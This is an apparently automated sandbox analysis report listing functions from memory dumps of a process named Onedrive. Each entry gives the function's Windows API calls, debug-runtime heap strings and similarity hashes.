Associated: 00000003.00000002.4568185783.00007FF8A0342000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.4568209327.00007FF8A0358000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.4568233286.00007FF8A035D000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ff8a0300000_Onedrive.jbxd

Similarity

API ID: new[]
String ID: %ls$Client hook re-allocation failure at file %hs line %d.$Client hook re-allocation failure.$Error: memory allocation: bad memory block type.$Error: memory allocation: bad memory block type.Memory allocated at %hs(%d).$Error: possible heap corruption at or near 0x%p$The Block at 0x%p was allocated by aligned routines, use _aligned_realloc()$_CrtIsValidHeapPointer(block)$__acrt_first_block == old_head$__acrt_last_block == old_head$minkernel\crts\ucrt\src\appcrt\heap\debug_heap.cpp$old_head->_line_number == line_number_for_ignore_blocks && old_head->_request_number == request_number_for_ignore_blocks$reallocation_is_allowed || (!reallocation_is_allowed && new_head == old_head)
API String ID: 4059295235-458177602
Opcode ID: b5581433664bbf5574ad46b3204ba3e9f57dab964faa428365c5c575a416aa92
Instruction ID: b2292e5c943d63d2e3cc45ec9b9d436b7a0fe3cae1617ab6c255e5f0e70970b3
Opcode Fuzzy Hash: b5581433664bbf5574ad46b3204ba3e9f57dab964faa428365c5c575a416aa92
Instruction Fuzzy Hash: F2322C36A1EF8695EB608B15E48037A77A5FB897D1F104536DA8D87BA4DF3DE480CB00

Function 00007FF6104FA33C Relevance: 26.5, APIs: 14, Strings: 1, Instructions: 226memoryCOMMON

Download Yara Rule

APIs

SLOpen.SLC(?,?,?,?,?,?,?,00000000), ref: 00007FF6104FA37E
SLGetLicensingStatusInformation.SLC(?,?,?,?,?,?,?,00000000), ref: 00007FF6104FA3BA
GetProcessHeap.KERNEL32(?,?,?,?,?,?,?,00000000), ref: 00007FF6104FA3ED
HeapAlloc.KERNEL32(?,?,?,?,?,?,?,00000000), ref: 00007FF6104FA401
GetProcessHeap.KERNEL32(?,?,?,?,?,?,?,00000000), ref: 00007FF6104FA5F9
HeapFree.KERNEL32(?,?,?,?,?,?,?,00000000), ref: 00007FF6104FA60D
LocalFree.KERNEL32(?,?,?,?,?,?,?,00000000), ref: 00007FF6104FA622
LocalFree.KERNEL32(?,?,?,?,?,?,?,00000000), ref: 00007FF6104FA63C
LocalFree.KERNEL32(?,?,?,?,?,?,?,00000000), ref: 00007FF6104FA656
SLClose.SLC(?,?,?,?,?,?,?,00000000), ref: 00007FF6104FA670

Strings

UXDifferentiator, xrefs: 00007FF6104FA4CF

Memory Dump Source

Source File: 00000003.00000002.4568034108.00007FF6104F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF6104F0000, based on PE: true

Associated: 00000003.00000002.4568007903.00007FF6104F0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.4568057962.00007FF610501000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.4568082269.00007FF610506000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.4568101163.00007FF610507000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ff6104f0000_Onedrive.jbxd

Similarity

API ID: FreeHeap$Local$Process$AllocCloseInformationLicensingOpenStatus
String ID: UXDifferentiator
API String ID: 3977053813-2471664420
Opcode ID: 9044375e2e7989267fff8dfc678b0600364f32c011c0966404f9a2e3441f9e71
Instruction ID: 0af6d77ceaa34daa1e20ad0ebf5cf5618463e07a3fa3acf4226487d5388333f9
Opcode Fuzzy Hash: 9044375e2e7989267fff8dfc678b0600364f32c011c0966404f9a2e3441f9e71
Instruction Fuzzy Hash: 25A16C72A08E02EAEF118F6594903BD7BA5FB89BA8F145534DE0E97B54DF38E4658300

Function 00007FF6104F5E74 Relevance: 22.9, APIs: 11, Strings: 2, Instructions: 152filememorylibraryCOMMON

Download Yara Rule

APIs

SetupOpenInfFileW.SETUPAPI ref: 00007FF6104F5EB8
GetLastError.KERNEL32 ref: 00007FF6104F5EF4
LoadLibraryExW.KERNEL32 ref: 00007FF6104F5F32
GetLastError.KERNEL32 ref: 00007FF6104F5F46
GetProcessHeap.KERNEL32 ref: 00007FF6104F604B
HeapFree.KERNEL32 ref: 00007FF6104F6060
FreeLibrary.KERNEL32 ref: 00007FF6104F607B
SetupCloseInfFile.SETUPAPI ref: 00007FF6104F6094

Part of subcall function 00007FF6104F597C: GetSystemDirectoryW.KERNEL32 ref: 00007FF6104F59F1
Part of subcall function 00007FF6104F597C: GetLastError.KERNEL32 ref: 00007FF6104F5A01
Part of subcall function 00007FF6104F597C: GetProcessHeap.KERNEL32 ref: 00007FF6104F5B69
Part of subcall function 00007FF6104F597C: HeapFree.KERNEL32 ref: 00007FF6104F5B7E
Part of subcall function 00007FF6104F597C: GetProcessHeap.KERNEL32 ref: 00007FF6104F5B96
Part of subcall function 00007FF6104F597C: HeapFree.KERNEL32 ref: 00007FF6104F5BAB
Part of subcall function 00007FF6104F597C: GetProcessHeap.KERNEL32 ref: 00007FF6104F5BC3
Part of subcall function 00007FF6104F597C: HeapFree.KERNEL32 ref: 00007FF6104F5BD8

Strings

tapiGetLocationInfo, xrefs: 00007FF6104F5F64
TapiCodes, xrefs: 00007FF6104F5FA7

Memory Dump Source

Source File: 00000003.00000002.4568034108.00007FF6104F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF6104F0000, based on PE: true

Associated: 00000003.00000002.4568007903.00007FF6104F0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.4568057962.00007FF610501000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.4568082269.00007FF610506000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.4568101163.00007FF610507000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ff6104f0000_Onedrive.jbxd

Similarity

API ID: Heap$Free$Process$ErrorLast$FileLibrarySetup$CloseDirectoryLoadOpenSystem
String ID: TapiCodes$tapiGetLocationInfo
API String ID: 3084871228-3986397507
Opcode ID: 624e032ff8f8052b215d109ab565f33b61593328c3df89e529d95a6be9fd6c6c
Instruction ID: 163e0eaaffc0a69f3a1ab2e6d4e204e8ea66f19343416416dcc41f9590d522a3
Opcode Fuzzy Hash: 624e032ff8f8052b215d109ab565f33b61593328c3df89e529d95a6be9fd6c6c
Instruction Fuzzy Hash: 44516B31A08E42E6FF149B29A4502BD77A4FF89FA4F449135EA1ED6788EF3CE4158700

Function 00007FF8A0327470 Relevance: 18.2, APIs: 12, Instructions: 212fileCOMMONLIBRARYCODE

Download Yara Rule

APIs

type_info::_name_internal_method.LIBCMTD ref: 00007FF8A03274F8

Part of subcall function 00007FF8A03281E0: _wcsupr_s.LIBCMTD ref: 00007FF8A03281F8

FindFirstFileExW.KERNEL32 ref: 00007FF8A03275D1
Concurrency::details::_Scheduler::_Scheduler.LIBCMTD ref: 00007FF8A03275DF
std::_Container_base12::~_Container_base12.LIBCPMTD ref: 00007FF8A0327624
std::_Container_base12::~_Container_base12.LIBCPMTD ref: 00007FF8A03276A0
std::_Container_base12::~_Container_base12.LIBCPMTD ref: 00007FF8A03276F6
std::_Container_base12::~_Container_base12.LIBCPMTD ref: 00007FF8A032773A
std::_Container_base12::~_Container_base12.LIBCPMTD ref: 00007FF8A0327751
FindNextFileW.KERNEL32 ref: 00007FF8A0327781
std::_Container_base12::~_Container_base12.LIBCPMTD ref: 00007FF8A03277C7
std::_Container_base12::~_Container_base12.LIBCPMTD ref: 00007FF8A032785E

Memory Dump Source

Source File: 00000003.00000002.4568144214.00007FF8A0301000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF8A0300000, based on PE: true

Associated: 00000003.00000002.4568124770.00007FF8A0300000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.4568185783.00007FF8A0342000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.4568209327.00007FF8A0358000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.4568233286.00007FF8A035D000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ff8a0300000_Onedrive.jbxd

Similarity

API ID: Container_base12Container_base12::~_std::_$FileFind$Concurrency::details::_FirstNextSchedulerScheduler::__wcsupr_stype_info::_name_internal_method
String ID:
API String ID: 1493447076-0
Opcode ID: cc861cbe94f13b17584c7a37f6fbde71b82270591c4d13bf4b386e749a55bb7e
Instruction ID: ff07c478e14f4cf3b9a7eb10426a7cff36fc6a29434019a3bb27a3f2cc50f017
Opcode Fuzzy Hash: cc861cbe94f13b17584c7a37f6fbde71b82270591c4d13bf4b386e749a55bb7e
Instruction Fuzzy Hash: 31B1516261EE8291DB60DB19E4903BEA3A4FBD97C0F500136E68D87BA9DF3CD545CB00

Function 00007FF8A031AD91 Relevance: 17.9, Strings: 14, Instructions: 414COMMON

Download Yara Rule

Strings

header->_block_use == block_use || header->_block_use == _CRT_BLOCK && block_use == _NORMAL_BLOCK, xrefs: 00007FF8A031B316
HEAP CORRUPTION DETECTED: before %hs block (#%d) at 0x%p.CRT detected that the application wrote to memory before start of heap buffer.Memory allocated at %hs(%d)., xrefs: 00007FF8A031B028
The Block at 0x%p was allocated by aligned routines, use _aligned_free(), xrefs: 00007FF8A031ADCC
__acrt_last_block == header, xrefs: 00007FF8A031B3AE
header->_line_number == line_number_for_ignore_blocks && header->_request_number == request_number_for_ignore_blocks, xrefs: 00007FF8A031B288
minkernel\crts\ucrt\src\appcrt\heap\debug_heap.cpp, xrefs: 00007FF8A031AED6, 00007FF8A031AF36, 00007FF8A031B2A9, 00007FF8A031B337, 00007FF8A031B3CF, 00007FF8A031B449
is_block_type_valid(header->_block_use), xrefs: 00007FF8A031AF15
_CrtIsValidHeapPointer(block), xrefs: 00007FF8A031AEB5
HEAP CORRUPTION DETECTED: after %hs block (#%d) at 0x%p.CRT detected that the application wrote to memory after end of heap buffer.Memory allocated at %hs(%d)., xrefs: 00007FF8A031B1AD
Client hook free failure., xrefs: 00007FF8A031AE70
HEAP CORRUPTION DETECTED: before %hs block (#%d) at 0x%p.CRT detected that the application wrote to memory before start of heap buffer., xrefs: 00007FF8A031B0B5
__acrt_first_block == header, xrefs: 00007FF8A031B428
%ls, xrefs: 00007FF8A031AEC1, 00007FF8A031AF21, 00007FF8A031B294, 00007FF8A031B322, 00007FF8A031B3BA, 00007FF8A031B434
HEAP CORRUPTION DETECTED: after %hs block (#%d) at 0x%p.CRT detected that the application wrote to memory after end of heap buffer., xrefs: 00007FF8A031B23A

Memory Dump Source

Source File: 00000003.00000002.4568144214.00007FF8A0301000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF8A0300000, based on PE: true

Associated: 00000003.00000002.4568124770.00007FF8A0300000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.4568185783.00007FF8A0342000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.4568209327.00007FF8A0358000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.4568233286.00007FF8A035D000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ff8a0300000_Onedrive.jbxd

Similarity

API ID:
String ID: %ls$Client hook free failure.$HEAP CORRUPTION DETECTED: after %hs block (#%d) at 0x%p.CRT detected that the application wrote to memory after end of heap buffer.$HEAP CORRUPTION DETECTED: after %hs block (#%d) at 0x%p.CRT detected that the application wrote to memory after end of heap buffer.Memory allocated at %hs(%d).$HEAP CORRUPTION DETECTED: before %hs block (#%d) at 0x%p.CRT detected that the application wrote to memory before start of heap buffer.$HEAP CORRUPTION DETECTED: before %hs block (#%d) at 0x%p.CRT detected that the application wrote to memory before start of heap buffer.Memory allocated at %hs(%d).$The Block at 0x%p was allocated by aligned routines, use _aligned_free()$_CrtIsValidHeapPointer(block)$__acrt_first_block == header$__acrt_last_block == header$header->_block_use == block_use || header->_block_use == _CRT_BLOCK && block_use == _NORMAL_BLOCK$header->_line_number == line_number_for_ignore_blocks && header->_request_number == request_number_for_ignore_blocks$is_block_type_valid(header->_block_use)$minkernel\crts\ucrt\src\appcrt\heap\debug_heap.cpp
API String ID: 0-3956125450
Opcode ID: 42c07789950f123e8db84fb944ed052ae9ea2649d9af8cc015498c765690b2ed
Instruction ID: 329dcb8ced25fc3ab8d3bc01a56a48c0c206120f55445c89eae31a013a3e1bc7
Opcode Fuzzy Hash: 42c07789950f123e8db84fb944ed052ae9ea2649d9af8cc015498c765690b2ed
Instruction Fuzzy Hash: F8225F36A0EF8696EB60CB55E48076AB7A4FB887D1F100436EA8D87B64DF7DD454CB00

Function 00007FF6104F8E4C Relevance: 17.6, APIs: 14, Instructions: 101memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 00007FF6104F93FC: GetProcessHeap.KERNEL32(?,?,?,00007FF6104F8E62,?,?,00000000,00007FF6104F8CA3), ref: 00007FF6104F9425
Part of subcall function 00007FF6104F93FC: HeapFree.KERNEL32(?,?,?,00007FF6104F8E62,?,?,00000000,00007FF6104F8CA3), ref: 00007FF6104F9439
Part of subcall function 00007FF6104F93FC: GetProcessHeap.KERNEL32(?,?,?,00007FF6104F8E62,?,?,00000000,00007FF6104F8CA3), ref: 00007FF6104F9460
Part of subcall function 00007FF6104F93FC: HeapFree.KERNEL32(?,?,?,00007FF6104F8E62,?,?,00000000,00007FF6104F8CA3), ref: 00007FF6104F9474

GetProcessHeap.KERNEL32(?,?,00000000,00007FF6104F8CA3), ref: 00007FF6104F8E6B
HeapFree.KERNEL32(?,?,00000000,00007FF6104F8CA3), ref: 00007FF6104F8E80
GetProcessHeap.KERNEL32(?,?,00000000,00007FF6104F8CA3), ref: 00007FF6104F8EA1
HeapFree.KERNEL32(?,?,00000000,00007FF6104F8CA3), ref: 00007FF6104F8EB6
GetProcessHeap.KERNEL32(?,?,00000000,00007FF6104F8CA3), ref: 00007FF6104F8ED7
HeapFree.KERNEL32(?,?,00000000,00007FF6104F8CA3), ref: 00007FF6104F8EEC
GetProcessHeap.KERNEL32(?,?,00000000,00007FF6104F8CA3), ref: 00007FF6104F8F0D
HeapFree.KERNEL32(?,?,00000000,00007FF6104F8CA3), ref: 00007FF6104F8F22
GetProcessHeap.KERNEL32(?,?,00000000,00007FF6104F8CA3), ref: 00007FF6104F8F43
HeapFree.KERNEL32(?,?,00000000,00007FF6104F8CA3), ref: 00007FF6104F8F58
GetProcessHeap.KERNEL32(?,?,00000000,00007FF6104F8CA3), ref: 00007FF6104F8F79
HeapFree.KERNEL32(?,?,00000000,00007FF6104F8CA3), ref: 00007FF6104F8F8E
GetProcessHeap.KERNEL32(?,?,00000000,00007FF6104F8CA3), ref: 00007FF6104F8FAF
HeapFree.KERNEL32(?,?,00000000,00007FF6104F8CA3), ref: 00007FF6104F8FC4

Memory Dump Source

Source File: 00000003.00000002.4568034108.00007FF6104F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF6104F0000, based on PE: true

Associated: 00000003.00000002.4568007903.00007FF6104F0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.4568057962.00007FF610501000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.4568082269.00007FF610506000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.4568101163.00007FF610507000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ff6104f0000_Onedrive.jbxd

Similarity

API ID: Heap$FreeProcess
String ID:
API String ID: 3859560861-0
Opcode ID: cae523c6d732ae3a046b12cbb7a892b6bb2d1f35e030631837f27fb96ec666e9
Instruction ID: 50f628e1fbcb9f66dbc65f63b39aa8aba56a8658acec4b74486a99585ede9a56
Opcode Fuzzy Hash: cae523c6d732ae3a046b12cbb7a892b6bb2d1f35e030631837f27fb96ec666e9
Instruction Fuzzy Hash: 83410B22A04E42E7EF149B2591583BDBBE0FF5DF59F498139D70A86359CF38D1248350

Function 00007FF6104F7B1C Relevance: 15.3, APIs: 10, Instructions: 284memorycomCOMMON

Download Yara Rule

APIs

CoCreateInstance.API-MS-WIN-CORE-COM-L1-1-0(?,?,?,?,00000000,00000002,?,00000000,?,00007FF6104F1653), ref: 00007FF6104F7B76
GetProcessHeap.KERNEL32(?,?,?,?,00000000,00000002,?,00000000,?,00007FF6104F1653), ref: 00007FF6104F7C3A
HeapAlloc.KERNEL32(?,?,?,?,00000000,00000002,?,00000000,?,00007FF6104F1653), ref: 00007FF6104F7C54
memset.MSVCRT ref: 00007FF6104F7C7A
GetProcessHeap.KERNEL32(?,?,?,?,00000000,00000002,?,00000000,?,00007FF6104F1653), ref: 00007FF6104F7CE9
HeapAlloc.KERNEL32(?,?,?,?,00000000,00000002,?,00000000,?,00007FF6104F1653), ref: 00007FF6104F7CFE
GetProcessHeap.KERNEL32(?,?,?,?,00000000,00000002,?,00000000,?,00007FF6104F1653), ref: 00007FF6104F7D76
HeapAlloc.KERNEL32(?,?,?,?,00000000,00000002,?,00000000,?,00007FF6104F1653), ref: 00007FF6104F7D8B
GetProcessHeap.KERNEL32(?,?,?,?,00000000,00000002,?,00000000,?,00007FF6104F1653), ref: 00007FF6104F7E03
HeapAlloc.KERNEL32(?,?,?,?,00000000,00000002,?,00000000,?,00007FF6104F1653), ref: 00007FF6104F7E18

Memory Dump Source

Source File: 00000003.00000002.4568034108.00007FF6104F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF6104F0000, based on PE: true

Associated: 00000003.00000002.4568007903.00007FF6104F0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.4568057962.00007FF610501000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.4568082269.00007FF610506000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.4568101163.00007FF610507000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ff6104f0000_Onedrive.jbxd

Similarity

API ID: Heap$AllocProcess$CreateInstancememset
String ID:
API String ID: 2970048943-0
Opcode ID: 2d6941d3c3f96ca2edc9991dc4b88ee1e50cea78047afc8d96a8f69007c24f62
Instruction ID: d17e468fcc0bb56388c74ce04f51a05fa44a9b4b20c83794b6546ef9d8ecab4c
Opcode Fuzzy Hash: 2d6941d3c3f96ca2edc9991dc4b88ee1e50cea78047afc8d96a8f69007c24f62
Instruction Fuzzy Hash: DEC16C32A18F82D2EB04DB29D9901AD37A4FB49F94B119636DA4DC3765EF3CE5A4C300

Function 00007FF6104F6454 Relevance: 15.1, APIs: 12, Instructions: 106memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(?,?,?,?,?,?,?,?,?,00007FF6104F7F0D,?,?,?,?,00000000,00000002), ref: 00007FF6104F64C0
HeapFree.KERNEL32(?,?,?,?,?,?,?,?,?,00007FF6104F7F0D,?,?,?,?,00000000,00000002), ref: 00007FF6104F64D5
GetProcessHeap.KERNEL32(?,?,?,?,?,?,?,?,?,00007FF6104F7F0D,?,?,?,?,00000000,00000002), ref: 00007FF6104F64F2
HeapFree.KERNEL32(?,?,?,?,?,?,?,?,?,00007FF6104F7F0D,?,?,?,?,00000000,00000002), ref: 00007FF6104F6507
GetProcessHeap.KERNEL32(?,?,?,?,?,?,?,?,?,00007FF6104F7F0D,?,?,?,?,00000000,00000002), ref: 00007FF6104F6524
HeapFree.KERNEL32(?,?,?,?,?,?,?,?,?,00007FF6104F7F0D,?,?,?,?,00000000,00000002), ref: 00007FF6104F6539
GetProcessHeap.KERNEL32(?,?,?,?,?,?,?,?,?,00007FF6104F7F0D,?,?,?,?,00000000,00000002), ref: 00007FF6104F6556
HeapFree.KERNEL32(?,?,?,?,?,?,?,?,?,00007FF6104F7F0D,?,?,?,?,00000000,00000002), ref: 00007FF6104F656B
GetProcessHeap.KERNEL32(?,?,?,?,?,?,?,?,?,00007FF6104F7F0D,?,?,?,?,00000000,00000002), ref: 00007FF6104F6588
HeapFree.KERNEL32(?,?,?,?,?,?,?,?,?,00007FF6104F7F0D,?,?,?,?,00000000,00000002), ref: 00007FF6104F659D
GetProcessHeap.KERNEL32(?,?,?,?,?,?,?,?,?,00007FF6104F7F0D,?,?,?,?,00000000,00000002), ref: 00007FF6104F65CD
HeapFree.KERNEL32(?,?,?,?,?,?,?,?,?,00007FF6104F7F0D,?,?,?,?,00000000,00000002), ref: 00007FF6104F65E1

Memory Dump Source

Source File: 00000003.00000002.4568034108.00007FF6104F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF6104F0000, based on PE: true

Associated: 00000003.00000002.4568007903.00007FF6104F0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.4568057962.00007FF610501000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.4568082269.00007FF610506000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.4568101163.00007FF610507000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ff6104f0000_Onedrive.jbxd

Similarity

API ID: Heap$FreeProcess
String ID:
API String ID: 3859560861-0
Opcode ID: 15737396d7e36de835ef5cf2251aab48bcf9544a645884e82e969f2fc5883780
Instruction ID: 283a3e4cc3c0c1aea858981fd03f400229e19abc7c1b9dee24a458c633d9f7be
Opcode Fuzzy Hash: 15737396d7e36de835ef5cf2251aab48bcf9544a645884e82e969f2fc5883780
Instruction Fuzzy Hash: 1F415C32A08E82E6EF149B25A1441BDBBA4FF8EF98B49D135DA4E87319DF3CD1558700

Function 00007FF6104F8CE0 Relevance: 15.1, APIs: 12, Instructions: 88memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 00007FF6104F93FC: GetProcessHeap.KERNEL32(?,?,?,00007FF6104F8E62,?,?,00000000,00007FF6104F8CA3), ref: 00007FF6104F9425
Part of subcall function 00007FF6104F93FC: HeapFree.KERNEL32(?,?,?,00007FF6104F8E62,?,?,00000000,00007FF6104F8CA3), ref: 00007FF6104F9439
Part of subcall function 00007FF6104F93FC: GetProcessHeap.KERNEL32(?,?,?,00007FF6104F8E62,?,?,00000000,00007FF6104F8CA3), ref: 00007FF6104F9460
Part of subcall function 00007FF6104F93FC: HeapFree.KERNEL32(?,?,?,00007FF6104F8E62,?,?,00000000,00007FF6104F8CA3), ref: 00007FF6104F9474

GetProcessHeap.KERNEL32(?,?,00000000,00007FF6104F8CAD), ref: 00007FF6104F8CFF
HeapFree.KERNEL32(?,?,00000000,00007FF6104F8CAD), ref: 00007FF6104F8D14
GetProcessHeap.KERNEL32(?,?,00000000,00007FF6104F8CAD), ref: 00007FF6104F8D35
HeapFree.KERNEL32(?,?,00000000,00007FF6104F8CAD), ref: 00007FF6104F8D4A
GetProcessHeap.KERNEL32(?,?,00000000,00007FF6104F8CAD), ref: 00007FF6104F8D6B
HeapFree.KERNEL32(?,?,00000000,00007FF6104F8CAD), ref: 00007FF6104F8D80
GetProcessHeap.KERNEL32(?,?,00000000,00007FF6104F8CAD), ref: 00007FF6104F8DA1
HeapFree.KERNEL32(?,?,00000000,00007FF6104F8CAD), ref: 00007FF6104F8DB6
GetProcessHeap.KERNEL32(?,?,00000000,00007FF6104F8CAD), ref: 00007FF6104F8DD7
HeapFree.KERNEL32(?,?,00000000,00007FF6104F8CAD), ref: 00007FF6104F8DEC
GetProcessHeap.KERNEL32(?,?,00000000,00007FF6104F8CAD), ref: 00007FF6104F8E0D
HeapFree.KERNEL32(?,?,00000000,00007FF6104F8CAD), ref: 00007FF6104F8E22

Memory Dump Source

Source File: 00000003.00000002.4568034108.00007FF6104F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF6104F0000, based on PE: true

Associated: 00000003.00000002.4568007903.00007FF6104F0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.4568057962.00007FF610501000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.4568082269.00007FF610506000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.4568101163.00007FF610507000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ff6104f0000_Onedrive.jbxd

Similarity

API ID: Heap$FreeProcess
String ID:
API String ID: 3859560861-0
Opcode ID: bf1518c68518747d8e75550e0073bb1ebe2d32fc955a20064eca9f5bcd791406
Instruction ID: eeaa1e97303343a98890ac5f246a8a8817e3c024b9eae2edf8f52c68df7d81ba
Opcode Fuzzy Hash: bf1518c68518747d8e75550e0073bb1ebe2d32fc955a20064eca9f5bcd791406
Instruction Fuzzy Hash: 29410A22A08E42E7EF189B2591583BCBBA0FF5DF59F49C539D60A86355CF38D1248340

Function 00007FF8A031A8F0 Relevance: 14.3, APIs: 1, Strings: 7, Instructions: 264COMMONLIBRARYCODE

Download Yara Rule

APIs

_CrtIsValidPointer.LIBCMTD ref: 00007FF8A031AA28

Part of subcall function 00007FF8A031BB90: swprintf.LIBCMTD ref: 00007FF8A031BCCD

Strings

crt block at 0x%p, subtype %x, %Iu bytes long., xrefs: 00007FF8A031AD23
normal block at 0x%p, %Iu bytes long., xrefs: 00007FF8A031AC7D
client block at 0x%p, subtype %x, %Iu bytes long., xrefs: 00007FF8A031AB4B
Dumping objects ->, xrefs: 00007FF8A031A929
#File Error#(%d) : , xrefs: 00007FF8A031AA57
{%ld} , xrefs: 00007FF8A031AAC5
%hs(%d) : , xrefs: 00007FF8A031AA96

Memory Dump Source

Source File: 00000003.00000002.4568144214.00007FF8A0301000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF8A0300000, based on PE: true

Associated: 00000003.00000002.4568124770.00007FF8A0300000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.4568185783.00007FF8A0342000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.4568209327.00007FF8A0358000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.4568233286.00007FF8A035D000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ff8a0300000_Onedrive.jbxd

Similarity

API ID: PointerValidswprintf
String ID: #File Error#(%d) : $%hs(%d) : $Dumping objects ->$client block at 0x%p, subtype %x, %Iu bytes long.$crt block at 0x%p, subtype %x, %Iu bytes long.$normal block at 0x%p, %Iu bytes long.${%ld}
API String ID: 2867872725-2254558347
Opcode ID: e0d5ac88001468575471fabc83286a0951fb7053397fe8767a2cadde61e4fbc8
Instruction ID: 3bb292b63a57b6dec3f44b33632eb23f39590ea631b4f693ed48ed4f0158c292
Opcode Fuzzy Hash: e0d5ac88001468575471fabc83286a0951fb7053397fe8767a2cadde61e4fbc8
Instruction Fuzzy Hash: 0CC12F3661DF8696EB60CB25E48176A73A0FB89792F104536EB8D87B69DF3DD440CB00

Function 00007FF8A031C980 Relevance: 14.1, APIs: 2, Strings: 6, Instructions: 145COMMONLIBRARYCODE

Download Yara Rule

APIs

__vcrt_lock.LIBVCRUNTIMED ref: 00007FF8A031CA2E

Part of subcall function 00007FF8A0326620: EnterCriticalSection.KERNEL32(?,?,?,?,00007FF8A0318375,?,?,?,?,00007FF8A0318062), ref: 00007FF8A0326641

Strings

Bad memory block found at 0x%p., xrefs: 00007FF8A031CBAA
_CrtMemCheckpoint, xrefs: 00007FF8A031CA14
%ls, xrefs: 00007FF8A031C9BE
Bad memory block found at 0x%p.Memory allocated at %hs(%d)., xrefs: 00007FF8A031CB7B
state != nullptr, xrefs: 00007FF8A031C9B2, 00007FF8A031CA1B
minkernel\crts\ucrt\src\appcrt\heap\debug_heap.cpp, xrefs: 00007FF8A031C9D3, 00007FF8A031CA0D

Memory Dump Source

Source File: 00000003.00000002.4568144214.00007FF8A0301000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF8A0300000, based on PE: true

Associated: 00000003.00000002.4568124770.00007FF8A0300000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.4568185783.00007FF8A0342000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.4568209327.00007FF8A0358000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.4568233286.00007FF8A035D000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ff8a0300000_Onedrive.jbxd

Similarity

API ID: CriticalEnterSection__vcrt_lock
String ID: %ls$Bad memory block found at 0x%p.$Bad memory block found at 0x%p.Memory allocated at %hs(%d).$_CrtMemCheckpoint$minkernel\crts\ucrt\src\appcrt\heap\debug_heap.cpp$state != nullptr
API String ID: 1786109592-3601319530
Opcode ID: 722345fc339e5307dad66cf511f6cbea81baa1efcc648aa63954b5faa99f4bf1
Instruction ID: 1ee8e91ad1048b1388d2d00337bacee9a13036b423c0d9197a5551a89641138d
Opcode Fuzzy Hash: 722345fc339e5307dad66cf511f6cbea81baa1efcc648aa63954b5faa99f4bf1
Instruction Fuzzy Hash: FF714036A2DF4696EB10CB19E48173AB3A0FB88795F204535EA8D87B94CF7DD455CB00

Function 00007FF6104FC214 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 145memoryCOMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 00007FF6104FC27A
